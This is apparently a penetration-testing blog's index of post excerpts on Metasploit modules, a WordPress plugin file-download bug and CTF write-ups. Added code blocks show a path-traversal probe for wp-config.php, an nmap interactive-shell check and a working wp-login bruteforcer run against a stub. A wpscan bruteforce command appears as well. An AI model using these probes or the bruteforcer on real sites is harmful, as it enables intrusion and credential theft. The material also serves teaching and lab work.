Automating web exploits using metasploit – 2
Categories
Injection, Web Attacks, webdev

In the previous article we covered the initialize method. Moving on to the juicy stuff: the check and exploit methods. Enter the check method. The check method is simple: we have already declared everything we need, so now let's put it to good use. Similar to our previous Python-based exploit, we […]

Automating web exploits using metasploit
Categories
Injection, Web Attacks, webdev

Today I want to go through something even I have been struggling with for a while: creating PoCs is a good thing, but creating actionable exploits for frameworks like Metasploit is really something else; it takes a lot more discipline. Why would we do this? Well, interactive shells are everyone's joy. PS: yes, I had […]

Scripts & Sploits
Categories
Projects

This project is dedicated to a number of items; the main aim of the repository is to solve challenges I run into while carrying out pentests and to populate PoCs/exploits where none are available at the time of testing. The main languages used so far are: Ruby, Python, Batch file scripting. The composition includes: Metasploit […]

[zero code] LFI and Arbitrary file download exploits on Mth3l3m3nt Framework
Categories
LFI, OWASP Mth3l3m3nt, pentest, Web Attacks

This simple post will take you through the process of adding an arbitrary file download exploit to mth3l3m3nt; so yes, there is no excuse for not having a working PoC for LFI or arbitrary file download because “I can’t code”. We will use the case of WordPress Plugin Membership Simplified v1.58 – Arbitrary File Download, whose process of coming […]

WordPress Plugin Membership Simplified v1.58 – Arbitrary File Download
Categories
LFI, Uncategorized, Web Attacks, webdev

Today we will discuss poor development practices in WordPress plugins, with key focus on WordPress Plugin Membership Simplified v1.58, whose script is not patched as of the time of this writing. The vulnerable script is as below: Metadata: Discovery: Larry W. Cashdollar; WPVDB ID: 8777; CVE-ID: CVE-2017-1002008; Dork Standard stuff […]
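The two posts above are about the same bug class, so here is one added example (my own code, not the plugin's script and not mth3l3m3nt's template) showing the development mistake behind an arbitrary file download beside a hardened handler, plus the traversal probe a zero-code PoC would send. The `uploads/` directory, the `wp-config.php` marker and the request values are constructed for illustration; the real plugin's parameter name and script are not on this page.

```python
import os
import tempfile


def vulnerable_download(docroot: str, requested: str) -> bytes:
    """The poor practice: a user-controlled file name is joined straight onto
    a directory and read back. '../' walks out of uploads/, and an absolute
    name discards the prefix entirely (os.path.join semantics)."""
    path = os.path.join(docroot, "uploads", requested)
    with open(path, "rb") as fh:
        return fh.read()


def safe_download(docroot: str, requested: str) -> bytes:
    """Hardened handler: resolve the real path (symlinks included) and refuse
    anything that does not remain inside the intended directory."""
    base = os.path.realpath(os.path.join(docroot, "uploads"))
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing path outside uploads: {requested!r}")
    if not os.path.isfile(target):
        raise FileNotFoundError(requested)
    with open(target, "rb") as fh:
        return fh.read()


def build_fixture() -> str:
    """Constructed sample site: a wp-config.php one level above uploads/."""
    root = tempfile.mkdtemp(prefix="wpdemo-")
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-secret'); ?>\n")
    with open(os.path.join(root, "uploads", "brochure.pdf"), "w") as fh:
        fh.write("%PDF-1.4 constructed brochure\n")
    return root


def probe(docroot: str, handler, max_depth: int = 4):
    """What an arbitrary-file-download PoC does: request wp-config.php at
    increasing traversal depths and report the first depth that leaks it
    (None if the handler never gives it up)."""
    for depth in range(max_depth + 1):
        candidate = "../" * depth + "wp-config.php"
        try:
            body = handler(docroot, candidate)
        except OSError:          # missing file, or the hardened refusal
            continue
        if b"DB_PASSWORD" in body:
            return depth
    return None


if __name__ == "__main__":
    root = build_fixture()
    print("vulnerable leaks at depth:", probe(root, vulnerable_download))
    print("hardened leaks at depth:  ", probe(root, safe_download))
```

The check against `realpath` rather than a string scan for `..` matters: URL-decoded and symlinked variants bypass blacklists, but they cannot bypass the resolved-prefix comparison.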

John The Troll (CTF – Africahackon) – Key 3-Part-2
Categories
ctf, pentest, Uncategorized, Web Attacks

Following the previous article where all exploits failed, there are still two doors left: Nmap be a bit old; Go for some “GRUB”. Nmap be a bit old: now for this bit, nmap is old, version 3.81. This can be abused via the --interactive option. More information on this can be found here. But basically […]
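An added check for this step (my code, not from the CTF write-up): interactive mode only exists in a window of nmap releases (2.02 through 5.21, per GTFOBins), so a version gate tells you whether the `nmap> !sh` route is even on the table before you try it. The banner strings are constructed to match `nmap --version` output.

```python
import re
from typing import Optional, Tuple


def parse_nmap_version(banner: str) -> Optional[Tuple[int, int]]:
    """Pull (major, minor) out of an `nmap --version` banner line."""
    m = re.search(r"[Nn]map version (\d+)\.(\d+)", banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def has_interactive_mode(banner: str) -> bool:
    """nmap shipped --interactive from 2.02 through 5.21 and removed it
    afterwards; inside that window `!<cmd>` at the nmap> prompt runs a
    shell command, which is what makes an old or SUID nmap abusable."""
    version = parse_nmap_version(banner)
    return version is not None and (2, 2) <= version <= (5, 21)


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["nmap", "--version"], capture_output=True,
                             text=True, check=False).stdout
        print("interactive mode available:", has_interactive_mode(out))
    except FileNotFoundError:
        print("nmap not on PATH")
```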

John The Troll (CTF – Africahackon) – Key 3
Categories
Crypto Stuff, ctf, OS, pentest, Uncategorized, Web Attacks

Now, from John The Troll (CTF – Africahackon) – Key 2, we have gotten to be Chicken, so the next thing would be getting information about the system. [+] Kernel: Linux version 3.13.0-55-generic (buildd@brownie) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 [+] fstab entries: # /etc/fstab: static file system […]

John The Troll (CTF – Africahackon) – Key 2
Categories
Crypto Stuff, ctf, OS, pentest, Uncategorized, Web Attacks

After the previous article we got the first key. Now, for the second key, we needed to move a notch higher into the system. We had a loot.dic, so the best option, seeing that so far we only have the web application facing us, would be bruteforcing it. root@mth3l3m3nt:~# wpscan -u http://192.168.238.101/ -U hacker123 -w ~/loot.dic […]
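What that wpscan invocation does underneath, as an added example (my code, not wpscan's): POST each wordlist entry to wp-login.php and decide success from what WordPress actually sends back. The username, wordlist and the stub transport standing in for the target are constructed so it runs offline; against a real host you would swap `fake_wp_login` for a function that performs the HTTP POST.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import parse_qs, urlencode


@dataclass
class Response:
    status: int
    headers: Dict[str, str]   # simplified: one Set-Cookie value, not a list
    body: str


def login_form(username: str, password: str) -> bytes:
    """The form fields wp-login.php expects; redirect_to/testcookie mirror
    what a browser submits so the request is not trivially distinguishable."""
    return urlencode({
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1",
    }).encode()


def login_succeeded(resp: Response) -> bool:
    """A correct password makes WordPress answer 302 to wp-admin and set a
    wordpress_logged_in_* cookie; a wrong one re-renders the form (200) with
    a #login_error block. Key on the cookie, not the status alone, since
    some hardening plugins redirect failures as well."""
    cookie = resp.headers.get("Set-Cookie", "")
    return resp.status == 302 and "wordpress_logged_in_" in cookie


def bruteforce(post: Callable[[str, bytes], Response], url: str,
               username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate in order; return the first one that logs in."""
    for pw in wordlist:
        pw = pw.strip()
        if not pw:
            continue
        if login_succeeded(post(url, login_form(username, pw))):
            return pw
    return None


# --- constructed stand-in for the target; behaves like wp-login.php -------
VALID_CREDS = {"hacker123": "letmein2017"}   # constructed, not the CTF's


def fake_wp_login(url: str, form: bytes) -> Response:
    fields = parse_qs(form.decode())
    user = fields.get("log", [""])[0]
    pw = fields.get("pwd", [""])[0]
    if VALID_CREDS.get(user) == pw:
        return Response(302, {"Location": "/wp-admin/",
                              "Set-Cookie": "wordpress_logged_in_abc=hacker123%7C1; path=/"}, "")
    return Response(200, {"Set-Cookie": "wordpress_test_cookie=WP+Cookie+check; path=/"},
                    '<div id="login_error"><strong>ERROR</strong>: '
                    'The password you entered is incorrect.</div>')


LOOT_DIC = ["password", "", "hacker123", "letmein2017", "admin"]  # constructed

if __name__ == "__main__":
    print(bruteforce(fake_wp_login, "http://192.168.238.101/wp-login.php",
                     "hacker123", LOOT_DIC))
```

Two caveats before pointing this at anything real: lockout plugins and rate limits will turn a wordlist run into a self-inflicted denial of service on the account, and a false positive on the success test (for example, keying on a 302 alone) wastes the rest of the engagement, which is why the cookie check is the one to trust.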
